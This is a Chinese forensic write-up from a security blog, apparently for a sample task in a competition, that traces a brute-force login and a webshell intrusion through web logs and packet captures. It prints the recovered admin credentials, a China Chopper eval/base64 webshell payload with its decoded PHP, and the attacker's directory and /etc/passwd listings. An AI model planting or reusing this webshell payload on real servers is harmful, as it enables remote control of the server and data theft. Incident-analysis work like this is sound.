铁人三项数据赛样题分析

脉搏文库 daiker

2018-04-26 10,108

0x00 题目

下载链接: 数据赛密码：wabt 解压密码：t3sectimu
背景提示：黑客对一个网站管理系统进行了暴力破解，成功获取了管理权限，并下载了重要文件。
问题：

黑客最终获得了什么用户名
黑客最终获得了什么密码
黑客修改了什么文件
黑客使用菜刀的完整连接地址
黑客使用菜刀的连接密码
黑客的查看的第一个文件目录是什么

0x01 初步分析攻击者IP

我们在假定攻击者攻击成功的情况下，应该会留下网页木马，先看下最后一个被访问的那些链接，这里通过Web Log Explorer 的Exit Point 查看

Exit Point

这里看到三个比较可疑的

tunnel.php
backdoor.php
y0n.php

然后看三个中最早的具体保文，可以看到

172.16.61.210 (LOCAL NETWORK) 2016/8/10 1:16:07 /y0n.php 200 - OK No Referrer
172.16.61.210 (LOCAL NETWORK) 2016/8/10 1:15:38 /backdoor.php 200 - OK No Referrer
101.36.79.67 (Beijing,Beijing,China) 2016/8/10 1:03:07 /tunnel.php 28 200 - OK No Referrer

这里面的/tunnel.php，如果我们做过内网渗透的时候应该都知道，这个是一个HTTP代理，

我们又注意到backdoor.php 和y0n.php 的访问IP都是内网，

再看下访问时间，可以推出攻击者是通过tunnul代理进来的。攻击者IP大致可以确定是101.36.79.67 。

现在已经的最早攻击成功时间是2016/8/10 1:03:07. 这个情况下分析下101.36.79.67 这个IP的访问记录。

我们通过Apache Logs Viewer 来过滤IP。分析攻击过程

访问情况.png

这里面没发现有啥能getshell的操作。
这条思路断了。

0x02 再分析攻击者IP

接下来通过单个页面的点击情况来分析(正常首页那种情况访问量应该多，，后台的访问应该比较少)

点击情况.png

然后这里陷入一个惯性思维，，以为index.php一定是首页。点进去才看到index.php?m=admin&c=index&a=login&pc_hash=xFbuB1 这样的链接，想起来这是用MVC 书写的时候的链接上次。点进index.php

后台.png

这里发现大量对后台进行访问，，初步推测可能在爆破账号密码。对IP进行过滤，排除掉内网IP，得到219.239.105.18 这个IP

0x03 分析攻击过程

我们通过Apache Logs Viewer 来过滤IP

爆破.png

我们分析该IP大约从2016/8/9 22:17 分开始进行爆破(后台，发送大量POST包可以推断出来)，然后我们往后看

成功.png

大约在 2016/8/9 23:02 爆破成功
接下来我们看到

edit.png

这里使用模板的editFile,修改的search 的index.html。
然后后面通过POST访问search这个模块初步推测，这里是种马和访问马的过程。这里单纯看日志有个不好的地方，就是看不到POST的body里面的内容，这个时候就得结合流量包。

0x04 分析攻击流量

我们通过流量包来验证上面日志的分析

0x01 分析爆破出来的账号密码

如果直接用wireshark一个个打开，太大了。这里推荐个软件 httppcap 专门用来提取http数据包的。总共有8个流量包，，如果一个个分析的话太繁琐，我们先大约估计爆破的在哪几个包里面。
通过一下shell脚本，提取每个包里面来自219.239.105.18 的http请求头部

for file in `ls`
do
parse-pcap -i 219.239.105.18 $file >> txt/$file.txt
done

然后匹配哪些包里面含有m=index 这样的请求

for file in `ls`
do
echo $file
cat $file|grep '/index.php?m=admin'
echo "-----------------------------------------------------"
done

得到爆破的流量都在数据采集D_eth0_NS_20160810_130801.pcap 这个文件里面
接下来使用 parse-pcap -i 219.239.105.18 -vvv 数据采集D_eth0_NS_20160810_130801.pcap > txt/all.txt

来查看所有的爆破时候的http具体报文

爆破报文.png

如图,爆破的数据包在里面，接下来寻找爆破成功的那个

根据发包时间和回包大小我们确实了登录成功的账号为root ，密码为123456 。

0x02 分析一句话

通过上面方法匹配m=search ,得到报文在
数据采集D_eth0_NS_20160810_141903.pcap ,数据采集D_eth0_NS_20160810_142037.pcap ,数据采集D_eth0_NS_20160810_142224.pcap 里面
然后提取报文详情

熟悉的一句话,urldecode一下

chopper=@eval(base64_decode($_POST[z0]));&z0=QGluaV9zZXQoImRpc3BsYXlfZXJyb3JzIiwiMCIpO0BzZXRfdGltZV9saW1pdCgwKTtAc2V0X21hZ2ljX3F1b3Rlc19ydW50aW1lKDApO2VjaG8oIi0+fCIpOzskRD1kaXJuYW1lKCRfU0VSVkVSWyJTQ1JJUFRfRklMRU5BTUUiXSk7aWYoJEQ9PSIiKSREPWRpcm5hbWUoJF9TRVJWRVJbIlBBVEhfVFJBTlNMQVRFRCJdKTskUj0ieyREfVx0IjtpZihzdWJzdHIoJEQsMCwxKSE9Ii8iKXtmb3JlYWNoKHJhbmdlKCJBIiwiWiIpIGFzICRMKWlmKGlzX2RpcigieyRMfToiKSkkUi49InskTH06Ijt9JFIuPSJcdCI7JHU9KGZ1bmN0aW9uX2V4aXN0cygncG9zaXhfZ2V0ZWdpZCcpKT9AcG9zaXhfZ2V0cHd1aWQoQHBvc2l4X2dldGV1aWQoKSk6Jyc7JHVzcj0oJHUpPyR1WyduYW1lJ106QGdldF9jdXJyZW50X3VzZXIoKTskUi49cGhwX3VuYW1lKCk7JFIuPSIoeyR1c3J9KSI7cHJpbnQgJFI7O2VjaG8oInw8LSIpO2RpZSgpOw==

密码为chooper

第一个目录是/var/www/html

0x03 一句话操作分析

总共有15个一句话操作
第一个解码完就是

<?php
@ini_set("display_errors", "0");
@set_time_limit(0);
@set_magic_quotes_runtime(0);
echo("->|");
$D = dirname($_SERVER["SCRIPT_FILENAME"]);
if ($D == "") $D = dirname($_SERVER["PATH_TRANSLATED"]);
$R = "{$D}\t";if (substr($D, 0, 1) != "/") {
    foreach (range("A", "Z") as $L)
        if (is_dir("{$L}:"))
            $R .= "{$L}:";
}
$R .= "\t";
$u = (function_exists('posix_getegid')) ? @posix_getpwuid(@posix_geteuid()) : '';$usr = ($u) ? $u['name'] : @get_current_user();$R .= php_uname();$R .= "({$usr})";print $R;;echo("|<-");die();

?>

这个脚本的作用是获取网页所在的绝对路径
接下来依次分析，分别是
查看 /var/www/html 目录底下的文件内容
有这些

caches/ 2016-08-04 10:40:44 4096 0777
uploadfile/ 2016-08-04 11:01:20 4096 0777
statics/ 2016-08-04 10:38:16 4096 0777
api/ 2016-08-04 10:38:16 4096 0777
../ 2016-08-04 10:37:16 4096 0755
phpsso_server/ 2016-08-04 10:38:16 4096 0777
html/ 2016-08-04 10:46:37 4096 0777
./ 2016-08-04 10:39:54 4096 0777
phpcms/ 2016-08-04 10:38:16 4096 0777
plugin.php 2016-08-04 10:38:16 3573 0777
index.html 2016-08-04 11:55:19 17588 0777
crossdomain.xml 2016-08-04 10:38:16 104 0777
robots.txt 2016-08-04 10:38:16 170 0777
admin.php 2016-08-04 10:38:16 48 0777
api.php 2016-08-04 10:38:16 595 0777
index.php 2016-08-04 10:38:16 318 0777
js.html 2016-08-04 10:38:16 523 0777
favicon.ico 2016-08-04 10:38:16 3158 0777

接下来查看的是根目录底下的文件夹,有

var/ 2016-07-22 19:50:16 4096 0755
selinux/ 2016-07-16 00:59:51 0 0755
lib/ 2016-07-11 23:51:40 4096 0555
dev/ 2016-07-16 01:01:30 3740 0755
media/ 2016-07-12 00:18:35 4096 0755
usr/ 2016-07-11 23:46:08 4096 0755
tmp/ 2016-08-09 18:16:02 4096 1777
etc/ 2016-08-09 18:16:11 12288 0755
proc/ 2016-07-16 00:59:50 0 0555
bin/ 2016-07-16 02:18:03 4096 0555
../ 2016-07-16 01:00:10 4096 0555
home/ 2016-08-04 10:23:14 4096 0755
srv/ 2011-09-23 19:50:20 4096 0755
opt/ 2016-07-12 00:03:18 4096 0755
sbin/ 2016-07-16 02:18:04 12288 0555
data1/ 2016-07-12 00:11:00 4096 0755
./ 2016-07-16 01:00:10 4096 0555
mnt/ 2016-07-12 00:01:13 4096 0755
sys/ 2016-07-16 00:59:50 0 0755
lib64/ 2016-07-16 02:17:51 12288 0555
boot 1970-01-01 08:00:00 0
root 1970-01-01 08:00:00 0
.autofsck 2016-07-16 01:00:10 0 0644
lost+found 1970-01-01 08:00:00 0

接下来查看/etc/ 底下的文件夹

./ 2016-08-09 18:16:11 12288 0755
../ 2016-07-16 01:00:10 4096 0555
rc4.d/ 2016-08-01 11:01:41 4096 0755
pulse/ 2016-07-12 00:01:49 4096 0755
skel/ 2016-07-11 23:50:01 4096 0755
bash_completion.d/ 2016-07-11 23:55:24 4096 0755
samba/ 2016-07-11 23:51:59 4096 0755
pango/ 2016-07-11 23:49:07 4096 0755
cron.hourly/ 2016-07-11 23:51:58 4096 0755
foomatic/ 2016-07-11 23:53:35 4096 0755
rwtab.d/ 2013-11-23 05:20:24 4096 0755
chkconfig.d/ 2013-09-23 17:07:36 4096 0755
obex-data-server/ 2016-07-11 23:49:42 4096 0755
wpa_supplicant/ 2016-07-11 23:48:32 4096 0755
vmware-tools/ 2016-07-12 00:03:14 4096 0755
logrotate.d/ 2016-07-16 02:41:56 4096 0755
gnome-vfs-2.0/ 2016-07-11 23:48:27 4096 0755
terminfo/ 2010-08-18 23:41:41 4096 0755
xdg/ 2016-07-11 23:50:13 4096 0755
alternatives/ 2016-07-11 23:52:04 4096 0755
hal/ 2016-07-11 23:50:59 4096 0755
setuptool.d/ 2016-07-11 23:51:14 4096 0755
init.d/ 2016-08-01 11:01:39 4096 0755
cups/ 2016-07-11 23:54:38 4096 0755
makedev.d/ 2016-07-11 23:47:34 4096 0755
ntp/ 2016-07-11 23:51:44 4096 0755
abrt/ 2016-07-11 23:48:54 4096 0755
pm/ 2016-07-11 23:46:08 4096 0755
rc.d/ 2016-07-12 00:03:18 4096 0755
httpd/ 2016-07-16 02:12:59 4096 0755
gdm/ 2016-07-11 23:51:13 4096 0755
gtk-2.0/ 2016-07-11 :50:01 4096 0755
ssl/ 2016-07-11 23:47:27 4096 0755
libreport/ 2016-07-11 23:48:53 4096 0755
gcrypt/ 2013-10-24 23:38:14 4096 0755
sound/ 2016-07-11 23:50:01 4096 0755
rc1.d/ 2016-08-01 11:01:41 4096 0755
yum.repos.d/ 2016-07-11 23:50:16 4096 0755
default/ 2016-07-11 23:46:45 4096 0755
dracut.conf.d/ 2016-07-12 00:01:52 4096 0755
rpm/ 2016-07-16 02:33:57 4096 0755
php.d/ 2016-07-16 02:33:56 4096 0755
avahi/ 2016-07-11 23:48:23 4096 0755
openldap/ 2016-07-11 23:58:43 4096 0755
sudoers.d/ 2013-11-22 20:51:12 4096 0750
festival/ 2016-07-11 23:50:10 4096 0755
kdump-adv-conf/ 2016-07-11 23:54:24 4096 0755
rsyslog.d/ 2013-11-22 23:15:59 4096 0755
depmod.d/ 2016-07-11 23:48:04 4096 0755
PackageKit/ 2016-07-11 23:50:14 4096 0755
snmp/ 2016-08-01 11:03:14 4096 0755
profile.d/ 2016-07-11 23:54:40 4096 0755
dnsmasq.d/ 2013-02-22 12:40:04 4096 0755
pam.d/ 2016-07-12 00:00:58 4096 0755
rc6.d/ 2016-08-01 11:01:41 4096 0755
sgml/ 2016-07-11 23:48:11 4096 0755
plymouth/ 2016-07-11 23:50:30 4096 0755
cron.weekly/ 2011-09-27 09:33:08 4096 0755
sane.d/ 2016-07-11 23:51:40 4096 0755
pear/ 2016-05-11 06:42:17 4096 0755
ppp/ 2016-07-11 23:50:19 4096 0755
event.d/ 2016-07-11 23:48:06 4096 0755
popt.d/ 2010-08-21 13:30:56 4096 0755
pcmcia/ 2016-07-11 23:52:27 4096 0755
rc0.d/ 2016-08-01 11:01:41 4096 0755
sysconfig/ 2016-08-01 11:01:39 4096 0755
lvm/ 2016-07-11 23:54:01 4096 0755
bonobo-activation/ 2016-07-11 23:47:18 4096 0755
audisp/ 2016-07-113:54:43 4096 0750
opt/ 2011-09-23 19:50:20 4096 0755
polkit-1/ 2016-07-11 23:48:05 4096 0755
prelink.conf.d/ 2016-07-12 00:00:53 4096 0755
gnupg/ 2013-10-24 23:38:54 4096 0755
ghostscript/ 2016-07-11 23:49:01 4096 0755
ld.so.conf.d/ 2016-07-16 01:49:50 4096 0755
rc2.d/ 2016-08-01 11:01:41 4096 0755
iproute2/ 2016-07-11 23:50:18 4096 0755
udev/ 2016-07-11 23:50:21 4096 0755
init/ 2016-07-11 23:54:28 4096 0755
cron.daily/ 2016-07-11 23:55:23 4096 0755
acpi/ 2016-07-11 23:54:28 4096 0755
rc3.d/ 2016-08-01 11:01:41 4096 0755
postfix/ 2016-07-11 23:51:54 4096 0755
X11/ 2016-07-11 23:51:00 4096 0755
ssh/ 2016-07-12 00:00:35 4096 0755
cron.monthly/ 2016-07-11 23:54:28 4096 0755
blkid/ 2013-11-22 23:29:33 4096 0755
security/ 2016-07-11 23:51:58 4096 0755
scl/ 2016-07-11 23:55:24 4096 0755
alsa/ 2016-07-11 23:52:26 4096 0755
gconf/ 2016-07-11 23:48:20 4096 0755
statetab.d/ 2013-11-23 05:20:24 4096 0755
pkcs11/ 2016-07-11 23:47:16 4096 0755
dbus-1/ 2016-07-11 23:47:00 4096 0755
sasl2/ 2016-07-11 23:51:54 4096 0755
hp/ 2016-07-11 23:51:40 4096 0755
pki/ 2016-07-11 23:51:43 4096 0755
fonts/ 2016-07-11 23:47:58 4096 0755
ConsoleKit/ 2016-07-11 23:48:06 4096 0755
xml/ 2016-07-11 23:46:06 4096 0755
dhcp/ 2013-11-22 22:30:00 4096 0750
rc5.d/ 2016-08-01 11:01:41 4096 0755
xinetd.d/ 2016-07-11 23:55:23 4096 0755
vmware-caf/ 2016-07-12 00:00:57 4096 0755
yum/ 2016-07-11 23:48:52 4096 0755
hosts.deny 2010-01-12 21:28:22 460 0644
statetab 20131-23 05:20:24 212 0644
networks 2013-11-23 05:20:24 58 0644
motd 2010-01-12 21:28:22 0 0644
ntp.conf 2013-07-15 17:18:47 1778 0644
at.deny 2012-01-30 21:56:34 1 0644
inputrc 2010-01-12 21:28:22 942 0644
pm-utils-hd-apm-restore.conf 2012-07-18 17:04:08 370 0644
.pwd.lock 1970-01-01 08:00:00 0
libuser.conf 2016-07-11 23:58:43 2290 0644
sudo-ldap.conf 2013-10-07 20:51:58 3181 0640
mailcap 2009-11-18 05:13:33 272 0644
bluetooth 1970-01-01 08:00:00 0
selinux 1970-01-01 08:00:00 0
mime.types 2011-09-23 23:02:51 43591 0644
rc.sysinit 1970-01-01 08:00:00 0
hosts.allow 2010-01-12 21:28:22 370 0644
magic 2012-10-04 22:51:04 111 0644
my.cnf 2016-05-11 14:31:18 251 0644
sysctl.conf 2013-11-23 05:20:24 1150 0644
crypttab 2016-07-11 23:45:38 0 0644
nanorc 2010-11-12 15:18:32 7846 0644
man.config 2013-02-22 10:13:09 4940 0644
csh.cshrc 2013-10-02 17:06:18 1602 0644
yum.conf 2013-02-22 19:26:34 969 0644
securetty 2010-01-12 21:28:22 122 0600
bashrc 2013-10-02 17:06:18 2681 0644
group 2016-07-16 02:31:22 774 0644
libaudit.conf 2012-03-02 02:42:34 191 0640
pbm2ppa.conf 2010-08-23 07:28:29 1362 0644
gshadow 1970-01-01 08:00:00 0
protocols 2010-01-12 21:28:22 6455 0644
dnsmasq.conf 2013-02-22 12:40:04 21214 0644
hosts 2010-01-12 21:28:22 158 0644
shadow 1970-01-01 08:00:00 0
passwd- 2016-07-11 23:59:08 1435 0644
vimrc 2012-02-17 23:17:03 1962 0644
quotatab 2013-11-22 19:32:14 259 0644
environment 2013-10-02 17:06:18 0 0644
portreserve 10-01-01 08:00:00 0
anacrontab 2013-11-23 20:43:13 541 0600
issue.net 2013-11-27 19:53:33 46 0644
centos-release 2013-11-27 19:53:33 27 0644
aliases 1970-01-01 08:00:00 0
mtab 2016-07-16 01:08:53 444 0644
quotagrpadmins 2008-10-14 01:29:19 220 0644
sudo.conf 2012-09-25 23:46:01 1786 0640
favicon.png 2007-01-25 05:13:36 918 0644
exports 2010-01-12 21:28:22 0 0644
sestatus.conf 2013-11-23 06:44:51 216 0644
printcap 2010-01-12 21:28:22 233 0644
rsyslog.conf 1970-01-01 08:00:00 0
gshadow- 1970-01-01 08:00:00 0
DIR_COLORS.256color 2013-10-17 20:51:45 5139 0644
ld.so.conf 2013-07-25 02:50:25 28 0644
DIR_COLORS 2013-10-17 20:51:45 4439 0644
rc.local 2016-07-11 23:59:08 220 0755
system-release-cpe 2013-11-27 19:53:33 25 0644
grub.conf 1970-01-01 08:00:00 0
localtime 2016-07-11 23:58:41 2819 0644
virc 2012-02-17 23:17:03 1962 0644
prelink.conf 2013-07-19 22:35:49 789 0644
services 2013-10-02 17:06:18 641020 0644
kdump.conf 2016-07-11 23:54:24 7786 0644
tpvmlp.conf 2016-07-16 01:01:27 1309 0644
host.conf 2013-10-02 17:06:18 9 0644
ethers 2012-05-10 16:17:31 28 0644
issue 2013-11-27 19:53:33 47 0644
pinforc 2010-08-21 09:43:26 2872 0644
drirc 2013-11-25 20:52:10 1804 0644
pnm2ppa.conf 2010-08-23 07:28:29 6300 0644
redhat-release 2013-11-27 19:53:33 27 0644
dracut.conf 2013-11-26 18:58:48 519 0644
updatedb.conf 1970-01-01 08:00:00 0
inittab 2016-07-12 00:03:18 884 0644
sudoers 2012-03-02 01:18:24 4002 0440
odbc.ini 2014-07-10 16::09 0 0644
adjtime 1970-01-01 08:00:00 0
csh.login 2013-10-02 17:06:18 794 0644
group- 2016-07-11 23:59:08 762 0600
pear.conf 2016-05-11 06:42:17 946 0644
wgetrc 2012-10-10 17:06:54 4479 0644
shadow- 1970-01-01 08:00:00 0
fstab 2016-07-12 00:03:17 805 0644
audit 1970-01-01 08:00:00 0
nsswitch.conf 2010-05-05 03:22:21 1688 0644
NetworkManager 1970-01-01 08:00:00 0
warnquota.conf 2013-11-22 19:32:22 3008 0644
login.defs 2016-07-11 23:58:43 1831 0644
mke2fs.conf 2009-09-08 05:02:53 801 0644
DIR_COLORS.lightbgcolor 2013-10-17 20:51:45 4113 0644
prelink.cache 1970-01-01 08:00:00 0
passwd.OLD 2016-07-11 23:59:08 1429 0644
mtools.conf 2010-08-17 05:28:51 2620 0644
readahead.conf 2013-11-23 21:52:17 966 0644
fprintd.conf 2013-11-22 22:35:33 20 0644
rwtab 2013-11-23 05:20:24 930 0644
mail.rc 2013-08-01 17:12:47 1909 0644
shadow.bak 2016-07-28 17:40:52 844 0755
smartd.conf 2013-02-22 06:26:22 6717 0644
odbcinst.ini 2014-07-10 16:15:09 575 0644
gai.conf 2013-11-22 05:24:28 0 0644
php.ini 2016-05-11 05:42:18 69097 0644
crontab 1970-01-01 08:00:00 0
ld.so.cache 2016-08-01 11:01:41 53651 0644
system-release 2013-11-27 19:53:33 27 0644
aliases.db 1970-01-01 08:00:00 0
passwd 2016-07-16 02:31:22 1487 0644
top.ini 2016-08-10 14:15:01 0 0644
modprobe.d 1970-01-01 08:00:00 0
enscript.cfg 2010-11-11 14:44:35 4843 0644
rpc 2010-05-04 19:27:23 1615 0644
cron.deny 2013-11-23 20:43:13 0 0600
cron.d 1970-01-01 08:00:00 0
shells 2016-07-113:54:44 61 0644
profile 2013-10-02 17:06:18 1796 0644
asound.conf 2009-05-15 04:53:38 148 0644
logrotate.conf 2007-08-29 15:19:36 662 0644
filesystems 2013-10-02 17:06:18 64 0644
krb5.conf 2013-08-29 01:33:13 449 0644
sos.conf 2013-11-23 03:12:07 260 0644
rc 1970-01-01 08:00:00 0
resolv.conf 2016-07-25 11:57:19 49 0644

接下来查看/etc/shadow这个文件，但是没看到，估计是因为权限不够
接下来查看/etc/passwd-
获得

|root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
dbus:x:81:81:System message bus:/:/sbin/nologin
usbmuxd:x:113:113:usbmuxd user:/:/sbin/nologin
vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
rtkit:x:499:497:RealtimeKit:/proc:/sbin/nologin
avahi-autoipd:x:170:170:Avahi IPv4LL Stack:/var/lib/avahi-autoipd:/sbin/nologin
abrt:x:173:173::/etc/abrt:/sbin/nologin
haldaemon:x:68:68:HAL daemon:/:/sbin/nologin
gdm:x:42:42::/var/lib/gdm:/sbin/nologin
ntp:x:38:38::/etc/ntp:/sbin/nologin
apache:x:48:48:Apache:/var/www:/sbin/nologin
saslauth:x:498:76:"Saslauthd user":/var/empty/saslauth:/sbin/nologin
postfix:x:89:89::/var/spool/postfix:/sbin/nologin
pulse:x:497:496:PulseAudio Syst Daemon:/var/run/pulse:/sbin/nologin
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
tcpdump:x:72:72::/:/sbin/nologin
simple:x:500:500:Simple:/home/simple:/bin/bash

接下来/home里面

没看到东西。
接下来查看/opt/底下
得到

../ 2016-07-16 01:00:10 4096    0555
./  2016-07-12 00:03:18 4096    0755
rh/ 2013-11-22 18:16:37 4096    0755

接下来又傻逼的查看/home里面

没看到东西。
接下来查看/var/里面
得到

db/ 2016-07-11 23:54:42 4096 0755
lib/ 2016-07-16 02:31:24 4096 0755
lock/ 2016-08-09 18:16:02 4096 0775
tmp/ 2016-08-08 09:46:00 4096 1777
spool/ 2016-07-11 23:54:43 4096 0755
run/ 2016-08-10 00:35:03 4096 0755
cache/ 2016-07-16 02:33:57 4096 0755
crash/ 2013-11-23 09:15:37 4096 0755
gdm/ 2013-11-22 23:54:18 4096 1770
preserve/ 2011-09-23 19:50:20 4096 0755
account/ 2016-07-11 23:54:44 4096 0755
www/ 2016-08-04 10:37:16 4096 0755
empty/ 2016-07-11 23:54:25 4096 0755
log/ 2016-08-07 18:36:03 4096 0755
nis/ 2011-09-23 19:50:20 4096 0755
local/ 2011-09-23 19:50:20 4096 0755
../ 2016-07-16 01:00:10 4096 0555
opt/ 2011-09-23 19:50:20 4096 0755
./ 2016-07-22 19:50:16 4096 0755
yp 1970-01-01 08:00:00 0
abc 1970-01-01 08:00:00 0
games 1970-01-01 08:00:00 0
mail 1970-01-01 08:00:00 0

接下来查看/var/log/
得到

ntpstats/ 2013-11-24 02:21:54 4096 0755
samba/ 2016-07-11 23:52:01 4096 0700
cups/ 2013-08-17 18:21:22 4096 0755
httpd/ 2016-08-07 18:36:02 4096 0700
gdm/ 2016-07-16 01:01:33 4096 1770
sa/ 2016-08-09 15:00:01 4096 0755
../ 2016-07-22 19:50:16 4096 0755
ppp/ 2010-08-23 07:22:22 4096 0700
./ 2016-08-07 18:36:03 4096 0755
prelink/ 2016-07-16 02:16:57 4096 0755
ConsoleKit/ 2016-07-12 00:03:21 4096 0755
vmware-caf/ 2016-07-12 00:01:49 4096 0755
secure 2016-08-10 14:10:25 997 0600
maillog-20160724 2016-07-22 19:34:03 3589 0600
yum.log 2016-08-01 14:59:17 1907 0600
anaconda.program.log 2016-07-11 23:59:08 31242 0600
pm-powersave.log 2016-07-16 01:01:34 89 0644
cron 2016-08-10 14:18:01 360975 0600
cron-20160724 2016-07-25 12:43:01 101645 0600
wtmp 2016-08-10 14:10:25 51072 0664
messages-20160724 2016-07-25 11:57:19 21952 0600
Xorg.0.log.old 2016-07-12 00:15:52 50682 0644
wpa_supplicant.log 2016-07-12 00:00:29 0 0644
anaconda.syslog 2016-07-11 23:59:08 148754 0600
anaconda.ifcfg.log 2016-07-11 23:59:08 2657 0600
anaconda.storage.log 2016-07-11 23:59:08 109194 0600
Xorg.1.log 2016-07-12 00:14:50 50448 0644
cron-20160807 2016-08-07 18:36:03 606821 0600
spooler-20160807 2016-07-31 18:37:02 0 0600
Xorg.0.log 2016-08-09 14:01:46 83699 0644
btm2016-08-10 14:06:03 9600 0600
anaconda.xlog 2016-07-11 23:59:08 35088 0600
boot.log 2016-07-16 01:01:29 2959 0644
secure-20160807 2016-08-05 20:01:06 27030 0600
messages-20160717 2016-07-16 02:41:58 285781 0600
spooler 2016-08-07 18:36:03 0 0600
vmware-vmsvc.log 2016-07-25 11:29:49 4779 0644
tallylog 2016-07-11 23:47:58 0 0600
spice-vdagent.log 2016-07-12 00:00:17 0 0600
vmware-vmusr.log 2016-08-03 11:04:06 10063 0644
mysqld.log.rpmsave 2016-07-16 02:41:39 1672 0640
maillog 2016-08-09 18:16:11 1795 0600
dmesg.old 2016-07-11 23:59:43 89000 0644
maillog-20160731 2016-07-30 18:32:35 4173 0600
spooler-20160717 2016-07-11 23:51:44 0 0600
cron-20160717 2016-07-17 18:16:01 35440 0600
maillog-20160807 2016-08-06 18:16:04 4195 0600
maillog-20160717 2016-07-16 18:22:11 1590 0600
spooler-20160724 2016-07-17 18:16:01 0 0600
spooler-20160731 2016-07-25 12:43:02 0 0600
vmware-tools-upgrader.log 2016-07-12 00:03:18 363533 0644
audit 1970-01-01 08:00:00 0
anaconda.log 2016-07-11 23:59:08 20411 0600
messages-20160731 2016-07-28 10:27:06 1884 0600
secure-20160724 2016-07-23 00:21:37 1654 0600
lastlog 2016-08-10 14:06:12 146292 0644
btmp-20160801 2016-08-01 11:33:21 14976 0600
anaconda.yum.log 2016-07-11 23:59:08 99366 0600
dmesg 2016-07-16 01:00:10 90056 0644
Xorg.2.log 2016-07-12 00:15:24 38224 0644
mysqld.log 2016-07-16 02:43:47 1367 0640
vmware-install.log 2016-07-12 00:03:18 5359 0644
secure-20160717 2016-07-16 03:13:18 7399 0600
secur20160731 2016-07-29 17:36:01 8445 0600
messages-20160807 2016-08-07 06:04:01 34355 0600
cron-20160731 2016-07-31 18:37:01 120163 0600
messages 2016-08-10 02:42:01 468 0600
dracut.log 2016-07-12 00:03:09 345367 0644

接下来，读取/var/log/yum.log的内容，，失败接下来想删除掉/var/log/yum.log，看样子失败了

接下来查看/var/empty/,得到

sshd/ 2013-11-23 06:40:03 4096 0711
../ 2016-07-22 19:50:16 4096 0755
./ 2016-07-11 23:54:25 4096 0755

好吧，又想删除/var/log/yum.log,还是失败

本文作者：daiker

本文为安全脉搏专栏作者发布，转载请注明：https://www.secpulse.com/archives/70908.html

Tags: daiker、分析攻击流量、分析攻击者IP、分析攻击过程、分析爆破出来的账号密码、暴力破解、样题分析、菜刀、铁人三项数据赛

点赞： 3 评论：0 收藏： 0

积分 12 金币 8

快来写下你的想法吧！

	daiker
	文章数：2	积分： 22

安全问答社区

脉搏官方公众号

活动日程

2022-06-17

Gdevops 全球敏捷运维峰会

2022-05-12

Mastering the Challenge！——来自The 3rd AutoCS 2022智能汽车信息安全大会的邀请函

2021-11-18

AutoSW 2021智能汽车软件开发大会

2021-06-27

2021中国国际网络安全博览会暨高峰论坛

2021-05-27

The 2nd AutoCS 2021智能汽车信息安全大会

2020-12-18

贝壳找房2020 ICS安全技术峰会

2020-12-11

全球敏捷运维峰会（Gdevops2020）

2020-12-04

2020京麒网络安全大会

2020-11-29

OPPO技术开放日第六期|聚焦应用与数据安全防护

2020-11-27

EISS-2020企业信息安全峰会之上海站 11.27

2020-09-24

CSDI summit中国软件研发管理行业技术峰会

2020-09-23

2020中国国际智慧能源暨能源数据中心与网络信息安全装备展览会

2020-07-31

EISS-2020企业信息安全峰会之北京站 | 7.31（周五线上）

2020-04-15

看雪.安恒 2020 KCTF 春季赛

2020-01-09

相约本地生活安全沙龙暨白帽子颁奖典礼

铁人三项数据赛样题分析

0x00 题目

0x01 初步分析攻击者IP

0x02 再分析攻击者IP

0x03 分析攻击过程